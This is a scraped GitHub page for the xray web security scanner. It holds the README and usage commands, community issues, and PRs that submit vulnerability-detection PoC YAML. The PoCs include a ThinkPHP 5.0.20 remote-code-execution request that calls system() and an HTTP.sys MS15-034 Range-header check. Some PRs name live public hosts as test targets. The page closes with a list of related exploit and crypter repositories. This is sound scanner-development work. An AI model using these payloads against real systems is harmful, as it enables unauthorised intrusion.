一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档

Welcome to xray 👋

Documentation

一款功能强大的安全评估工具

Demo

🏠 使用文档 ⬇️ 下载地址

注意:xray 不开源,直接下载构建的二进制文件即可,仓库内主要为社区贡献的 poc,每次 xray 发布将自动打包。

🚀 快速使用

在使用之前,请务必阅读并同意 License 文件中的条款,否则请勿安装使用本工具。

  1. 使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描

    xray webscan --basic-crawler http://example.com --html-output vuln.html
  2. 使用 HTTP 代理进行被动扫描

    xray webscan --listen 127.0.0.1:7777 --html-output proxy.html

    设置浏览器 http 代理为 http://127.0.0.1:7777,就可以自动分析代理流量并扫描。

    如需扫描 https 流量,请阅读下方文档 抓取 https 流量 部分

  3. 只扫描单个 url,不使用爬虫

    xray webscan --url http://example.com/?a=b --html-output single-url.html
  4. 手动指定本次运行的插件

    默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件。

    xray webscan --plugins cmd-injection,sqldet --url http://example.com
    xray webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777
  5. 指定插件输出

    可以指定将本次扫描的漏洞信息输出到某个文件中:

    xray webscan --url http://example.com/?a=b \
    --text-output result.txt --json-output result.json --html-output report.html

    报告样例

其他用法请阅读文档: https://docs.xray.cool

🛠 检测模块

新的检测模块将不断添加

  • XSS漏洞检测 (key: xss)

    利用语义分析的方式检测XSS漏洞

  • SQL 注入检测 (key: sqldet)

    支持报错注入、布尔注入和时间盲注等

  • 命令/代码注入检测 (key: cmd-injection)

    支持 shell 命令注入、PHP 代码执行、模板注入等

  • 目录枚举 (key: dirscan)

    检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件

  • 路径穿越检测 (key: path-traversal)

    支持常见平台和编码

  • XML 实体注入检测 (key: xxe)

    支持有回显和反连平台检测

  • poc 管理 (key: phantasm)

    默认内置部分常用的 poc,用户可以根据需要自行构建 poc 并运行。文档:https://docs.xray.cool/#/guide/poc

  • 文件上传检测 (key: upload)

    支持常见的后端语言

  • 弱口令检测 (key: brute-force)

    社区版支持检测 HTTP 基础认证和简易表单弱口令,内置常见用户名和密码字典

  • jsonp 检测 (key: jsonp)

    检测包含敏感信息可以被跨域读取的 jsonp 接口

  • ssrf 检测 (key: ssrf)

    ssrf 检测模块,支持常见的绕过技术和反连平台检测

  • 基线检查 (key: baseline)

    检测低 SSL 版本、缺失的或错误添加的 http 头等

  • 任意跳转检测 (key: redirect)

    支持 HTML meta 跳转、30x 跳转等

  • CRLF 注入 (key: crlf-injection)

    检测 HTTP 头注入,支持 query、body 等位置的参数

  • Struts2 系列漏洞检测 (高级版,key: struts)

    检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045等常见漏洞

  • Thinkphp系列漏洞检测 (高级版,key: thinkphp)

    检测ThinkPHP开发的网站的相关漏洞

  • ..

⚡️ 进阶使用

下列高级用法请查看 https://docs.xray.cool/ 使用。

  • 修改配置文件
  • 抓取 https 流量
  • 修改 http 发包配置
  • 反连平台的使用
  • ...

😘 贡献 POC

参照: https://docs.xray.cool/#/guide/contribute

📝 讨论区

提交误报漏报需求等等请务必先阅读 https://docs.xray.cool/#/guide/feedback

如有问题可以在 GitHub 提 issue, 也可在下方的讨论组里

  1. GitHub issue: https://github.com/chaitin/xray/issues
  2. QQ 群: 717365081
  3. 微信群: 扫描以下二维码关注 xray 公众号,点击菜单加群,按照提示进行操作即可。

Comments
  • 1.9.3 反连报错

    1.9.3 反连报错

    使用的独立部署的反连平台,而且根本没有配置dns反连接, dns_server_ip: "" 同样的配置文件再1.8版本没有报错,在这个版本每次运行都要不停的报错 [ERRO] [runner client:reverse.go:20] got domain error, reverse/client config dns_server_ip is empty

  • 74cms-sqli-2

    74cms-sqli-2

    本 poc 是检测什么漏洞的

    检测骑士CMS V3.4.20140530 /plus/ajax_officebuilding.php文件是否存在SQL注入漏洞

    测试环境

    http://www.cnxxrcw.cn/

    备注

    由于该74cms版本比较老,很难搭建本地环境,在公网上找到一个复现漏洞的靶机。另外在PR里也有74cms的poc,测试环境与此一样。

  • 一些功能增强建议

    一些功能增强建议

    0x00 json输出格式问题

    json能一行一行输出么?现在的--json-output是json展开了,并且开始是[,每个json连接有个,,如果监控json文件结果,不好处理,查看结果,jq 也不好查看. 如果一行一个json,不用展开就是最好滴.

    0x01 headers问题

    现在只能预制1个header,在mitm原始流量和xray扫描流量容易混合了。在后面的nginx lua上不好做规则。mitm和scan流量能分别设置headers么。这样就容易区分了。 所以,建议config.yml中2处headers自定义配置. mitm的,扫描的.

    0x02 webhook功能

    扫描成功后,带上原始json,向指定url发送一个post请求,那就是最好滴.

    0x03 reverse功能

    是否后期可能对接dnslog平台呢? 或者对齐下格式,dnslog平台异步打个请求回来。

    0x04 http代理问题

    能否兼容下proxychains(ng)等工具的http代理. (换个代理库可能就好了. 比如v2ray-core之类的兼容性好) 比如proxychains4 python soft.py把流量导入xray

  • 关于 poc 逻辑分支

    关于 poc 逻辑分支

    讨论一下,是否有必要支持 poc 的逻辑分支,按现在对xray的了解,poc只能向下执行,遇到expression为false则退出

    考虑一种特殊情况,某一个漏洞,需要发两个包,第一个包有三种情况,其中两种是漏洞存在 第二个包在漏洞存在的基础上,根据不同响应执行不同请求

    如果没有逻辑分支,此时需要写两个poc,而两个poc最多需要请求四次才能验证漏洞是否存在,而且至少会请求两次

    如果加入逻辑分支,则请求次数会降低为最少一次最多两次,在请求次数上产生了优化

    其次则是符合了一个漏洞一个poc的原则,在poc提交上显得相对完善

    此外,对于逻辑分支而言,除了if switch的实现方法之外,实际上只需要支持三元表达式和expression赋值,就可以实现一个比较hack的逻辑分支,考虑下面的伪代码

    expression: response == 200 && set(value = test1) || response == 201 && set(value = test2) || response == 202 && set(value = test3)
    ...
    path: {{!! value == test1 ? '/param1' : (value == test2 ? '/prarm2' : '/param3') !!}}
    
    

    这种实现方式在需要的请求数增加时,会显得混乱,因为没有明确的指出上上级,不过混乱的问题也可以通过动态赋值近似解决,比如设置流程路径为 001 011等,但完整的分支逻辑也许是更好的解决方案

    如有对poc流程理解不正确的,还请指正

  • Add jira-ssrf-cve-2019-8451 POC

    Add jira-ssrf-cve-2019-8451 POC

    本 poc 是检测什么漏洞的

    检测Jira未授权SSRF漏洞(CVE-2019-8451)

    测试环境

    补充一下测试环境的搭建

    sudo docker pull cptactionhank/atlassian-jira:7.8.0
    sudo docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
    

    之后注册一个 Atlassian 的账号申请试用 lisence 按引导进行配置即可。

    备注

    本地测试截图: image

    image

  • Create poc-yaml-HTTP.SYS-MS15-034-RCE

    Create poc-yaml-HTTP.SYS-MS15-034-RCE

    Summary

    what POC is this PR for? poc-yaml-HTTP.SYS-MS15-034-RCE

    POC

    name: poc-yaml-HTTP.SYS-MS15-034-RCE
    rules:
      - method: GET
        path: /
        headers:
          User-Agent: >-
            Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36
            (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
          Range: bytes=0-18446744073709551615
        follow_redirects: true
        expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')
    

    Test Environment

    The vuln can be reproduced in the following docker environment.

    Dockerfile:

    http://107.167.27.251/
    

    Remarks

    Write you voice here.

  • tp5.0.20update

    tp5.0.20update

    Summary

    what POC is this PR for? thinkphp 5.0.20-rce

    POC

    name: poc-yaml-tp5.0.20
    rules:
      - method: GET
        path: >-
          /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20vulnerable
        follow_redirects: false
        expression: status==200 && body.bcontains(b'vulnerable')
    

    Test Environment

    http://39.105.202.187:8080 The vuln can be reproduced in the following docker environment.

    Dockerfile:

    
    

    Or docker-compose:

    version: '3'
    services:
     web:
       image: vulhub/thinkphp:5.0.20
       ports:
        - "8080:80"
    

    Remarks

    Write you voice here.

  • create poc-yaml-zentao-php-api-sql

    create poc-yaml-zentao-php-api-sql

    请先确保符合以下几点要求

    • 阅读 poc 提交规范和要求 https://chaitin.github.io/xray/#/guide/contribute https://chaitin.github.io/xray/#/guide/high_quality_poc
    • 本 repo 中已经合并的和未合并的 pull request 中不含有相同的 poc,可以在网页端左上角搜索查看
    • 一个 pull request 尽量只提交一个 poc,否则可能审核和修改过程会互相影响
    • 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交,可以私聊群管理员
    • 下方的测试环境可以参考 vulhub vulnapps 。请勿直接填写公网上未修复的站点的地址,如果有特殊情况,请私聊解决。不接受没有测试环境的 poc
    • 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励,请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信,说明你的 poc 地址,方便发送奖励。

    我是分割线,在提交 poc 填写说明的时候,请务必阅读上方要求,然后删除本分割线和上方的内容,只保留下面自定义的部分即可,否则不予通过。


    本 poc 是检测什么漏洞的

    通达OA upload+rce

    测试环境

    windows server 2012 TDOA11.3.exe 下载链接:https://cdndown.tongda2000.com/oa/2019/TDOA11.3.exe

    备注

    调试通过,本地测试多次均验证通过。

    xray 执行: ./xray webscan --plugins phantasm --poc tongda-oa-rce.yml --url http://10.211.55.16

  • It does nothing

    It does nothing

    netikras@netikras-xps:~/received$ ./xray_linux_amd64 servicescan --target x.x.96.13:443
    
     __   __  _____              __     __
     \ \ / / |  __ \      /\     \ \   / /
      \ V /  | |__) |    /  \     \ \_/ / 
       > <   |  _  /    / /\ \     \   /  
      / . \  | | \ \   / ____ \     | |   
     /_/ \_\ |_|  \_\ /_/    \_\    |_|   
                                          
    
    Version: 0.19.2/532ab599/COMMUNITY
    
    [INFO] 2020-02-29 20:25:49 +0200 [default:single.go:334] wait for task done
    netikras@netikras-xps:~/received$ echo $?
    0
    netikras@netikras-xps:~/received$
    ```
    
    
    IP has been masked before posting the issue
  • magento2.2-sqli.yml

    magento2.2-sqli.yml

    请先确保符合以下几点要求

    • 阅读 poc 提交规范和要求 https://chaitin.github.io/xray/#/guide/contribute https://chaitin.github.io/xray/#/guide/high_quality_poc
    • 本 repo 中已经合并的和未合并的 pull request 中不含有相同的 poc,可以在网页端左上角搜索查看
    • 一个 pull request 尽量只提交一个 poc,否则可能审核和修改过程会互相影响
    • 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交,可以私聊群管理员
    • 下方的测试环境可以参考 vulhub vulnapps 。请勿直接填写公网上未修复的站点的地址,如果有特殊情况,请私聊解决。不接受没有测试环境的 poc
    • 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励,请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信,说明你的 poc 地址,方便发送奖励。

    我是分割线,在提交 poc 填写说明的时候,请务必阅读上方要求,然后删除本分割线和上方的内容,只保留下面自定义的部分即可


    本 poc 是检测什么漏洞的

    sql注入

    测试环境

    magento

    备注

    author: lnk23y links:https://github.com/vulhub/vulhub/tree/master/magento/2.2-sqli

  • Add files via upload

    Add files via upload


    本 poc 是检测什么漏洞的

    Joomla! configuration.php文件RCE漏洞( CNVD-2019-34135 )

    测试环境

    https://downloads.joomla.org/it/cms/joomla3/3-4-6 搭建测试即可

    备注

    不要默认配置带的cookie,否则可能检测不出

  • Crawling POST Parameters

    Crawling POST Parameters

    Hello Developers,,

    The Tool is great after many scans I've discover and be sure that the tool not crawl all parameters in pages specially the "parameters" in the "Filter Categories" most of this "Filters" are with POST requests

    Here a live example for the Filter Categories

    Step 1 https://i.ibb.co/0KNTH20/1.png

    Step 2 https://i.ibb.co/y69q7x7/2.png

    Step 3 https://i.ibb.co/YpD7vWJ/3.png

    Hope my explain is clear and I hope the developer's find a solution to fix the crawl techniques to make the tool Crawl like this POST requests to make the tool extract more "parameters"

    Best Regards,, and keep this tool UP!

  • dirscan admin 扫描重复结果

    dirscan admin 扫描重复结果

    dirscan/admin/default 扫描会出现不同后缀的结果 好像也是1.9.x新版本的问题,之前1.8.x的版本没发现这个问题

    https://example.com/admin.html
    https://example.com/admin.jsp
    https://example.com/admin.do
    https://example.com/admin.asp
    https://example.com/admin
    https://example.com/admin/
    
  • Bump express from 4.17.1 to 4.18.2 in /report

    Bump express from 4.17.1 to 4.18.2 in /report

    Bumps express from 4.17.1 to 4.18.2.

    Release notes

    Sourced from express's releases.

    4.18.2

    4.18.1

    • Fix hanging on large stack of sync routes

    4.18.0

    ... (truncated)

    Changelog

    Sourced from express's changelog.

    4.18.2 / 2022-10-08

    4.18.1 / 2022-04-29

    • Fix hanging on large stack of sync routes

    4.18.0 / 2022-04-25

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

  • Bump qs from 6.5.2 to 6.5.3 in /report

    Bump qs from 6.5.2 to 6.5.3 in /report

    Bumps qs from 6.5.2 to 6.5.3.

    Changelog

    Sourced from qs's changelog.

    6.5.3

    • [Fix] parse: ignore __proto__ keys (#428)
    • [Fix] utils.merge: avoid a crash with a null target and a truthy non-array source
    • [Fix] correctly parse nested arrays
    • [Fix] stringify: fix a crash with strictNullHandling and a custom filter/serializeDate (#279)
    • [Fix] utils: merge: fix crash when source is a truthy primitive & no options are provided
    • [Fix] when parseArrays is false, properly handle keys ending in []
    • [Fix] fix for an impossible situation: when the formatter is called with a non-string value
    • [Fix] utils.merge: avoid a crash with a null target and an array source
    • [Refactor] utils: reduce observable [[Get]]s
    • [Refactor] use cached Array.isArray
    • [Refactor] stringify: Avoid arr = arr.concat(...), push to the existing instance (#269)
    • [Refactor] parse: only need to reassign the var once
    • [Robustness] stringify: avoid relying on a global undefined (#427)
    • [readme] remove travis badge; add github actions/codecov badges; update URLs
    • [Docs] Clean up license text so it’s properly detected as BSD-3-Clause
    • [Docs] Clarify the need for "arrayLimit" option
    • [meta] fix README.md (#399)
    • [meta] add FUNDING.yml
    • [actions] backport actions from main
    • [Tests] always use String(x) over x.toString()
    • [Tests] remove nonexistent tape option
    • [Dev Deps] backport from main
    Commits
    • 298bfa5 v6.5.3
    • ed0f5dc [Fix] parse: ignore __proto__ keys (#428)
    • 691e739 [Robustness] stringify: avoid relying on a global undefined (#427)
    • 1072d57 [readme] remove travis badge; add github actions/codecov badges; update URLs
    • 12ac1c4 [meta] fix README.md (#399)
    • 0338716 [actions] backport actions from main
    • 5639c20 Clean up license text so it’s properly detected as BSD-3-Clause
    • 51b8a0b add FUNDING.yml
    • 45f6759 [Fix] fix for an impossible situation: when the formatter is called with a no...
    • f814a7f [Dev Deps] backport from main
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

  • Bump decode-uri-component from 0.2.0 to 0.2.2 in /report

    Bump decode-uri-component from 0.2.0 to 0.2.2 in /report

    Bumps decode-uri-component from 0.2.0 to 0.2.2.

    Release notes

    Sourced from decode-uri-component's releases.

    v0.2.2

    • Prevent overwriting previously decoded tokens 980e0bf

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.1...v0.2.2

    v0.2.1

    • Switch to GitHub workflows 76abc93
    • Fix issue where decode throws - fixes #6 746ca5d
    • Update license (#1) 486d7e2
    • Tidelift tasks a650457
    • Meta tweaks 66e1c28

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.0...v0.2.1

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

Poc-cve-2021-4034 - PoC for CVE-2021-4034 dubbed pwnkit

poc-cve-2021-4034 PoC for CVE-2021-4034 dubbed pwnkit Compile exploit.go go buil

Nov 9, 2022
PoC for running AWS services(kinesis, dynamodb, lambdas) locally with Localstack

hotdog-localstack-PoC PoC for running AWS services(kinesis, dynamodb, lambdas) locally with Localstack alias awslocal="aws --endpoint-url=http://local

Dec 3, 2022
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

ZipExec ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded i

Dec 31, 2022
An improvement on the PoC for the privacy-preserving contact discovery scheme I implemented as part of my UCL masters degree

Privacy-Preserving Contact Discovery / ARKE - PoC This is an improved version of the work I submitted as part of my masters degree dissertation at UCL

Dec 18, 2021
PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS
PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS

CVE-2015-1635 PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS ./MS15-034 <URL> <RESOURCE> <FLAG [0 or 18]> Note

Nov 3, 2021
A CVE-2021-22205 Gitlab RCE POC written in Golang

Golang-CVE-2021-22205-POC A bare bones CVE-2021-22205 Gitlab RCE POC written in Golang which affects Gitlab CE/EE < 13.10.3 Gitlab CE/EE < 13.9.6 Gitl

Jul 4, 2022
PoC for CVE-2021-41277

CVE-2021-41277 PoC Metabase is an open source data analytics platform. Local File Inclusion issue has been discovered in some versions of metabase. He

Dec 3, 2021
Gocrypter - Crypter em golang (POC)
Gocrypter - Crypter em golang (POC)

Gocrypter Crypter em golang (POC) Uso ./gocrypter <executável> Estágios do crypter Comprimi o arquivo malicioso usando a ZLIB Criptografa os bytes res

Jan 2, 2022
Go poc - Golang proof of concept

quickstart tar -zxvf go1.17.6.linux-amd64.tar.gz -C ~/tools/ echo "export PATH=

Jan 8, 2022
Vishnu - Golang port-knocking PoC

Vishnu(The Hidden Backdoor) Taken from the Trimurit, the triple deity of supreme

Nov 9, 2022
🗡 Molag is a POC/awareness project for dependency risks.

molag // ?? WIP Intro This is a POC package, showcasing why dependencies in general (in any programming language/framework) are a bad idea. This does

Sep 23, 2022
SandboxPPL - Golang PoC that sandboxes Defender (or other PPL) by setting its token integrity to Untrusted
SandboxPPL - Golang PoC that sandboxes Defender (or other PPL) by setting its token integrity to Untrusted

SandboxPPL Golang PoC that sandboxes Defender (or other PPL) by setting its toke

Jul 1, 2022
A web-based testing platform for WAF (Web Application Firewall)'s correctness

WAFLab ?? WAFLab is a web-based platform for testing WAFs. Live Demo https://waflab.org/ Architecture WAFLab contains 2 parts: Name Description Langua

Oct 25, 2022
Web-Security-Academy - Web Security Academy, developed in GO

Web-Security-Academy - Web Security Academy, developed in GO

Feb 23, 2022
Gryffin is a large scale web security scanning platform.

Gryffin (beta) Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems w

Dec 27, 2022
set of web security test cases and a toolkit to construct new ones

Webseclab Webseclab contains a sample set of web security test cases and a toolkit to construct new ones. It can be used for testing security scanners

Jan 7, 2023
Open Source Web Application Firewall
Open Source Web Application Firewall

DEPRECATED This repository started as a good idea but I didn't have enough time or desire to work on it. So, it's left here for historical / education

Nov 24, 2022
Fast web fuzzer written in Go
Fast web fuzzer written in Go

/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \

Jan 5, 2023
Coraza WAF is a golang modsecurity compatible web application firewall library
Coraza WAF is a golang modsecurity compatible web application firewall library

Coraza Web Application Firewall, this project is a Golang port of ModSecurity with the goal to become the first enterprise-grade Open Source Web Application Firewall, flexible and powerful enough to serve as the baseline for many projects.

Jan 9, 2023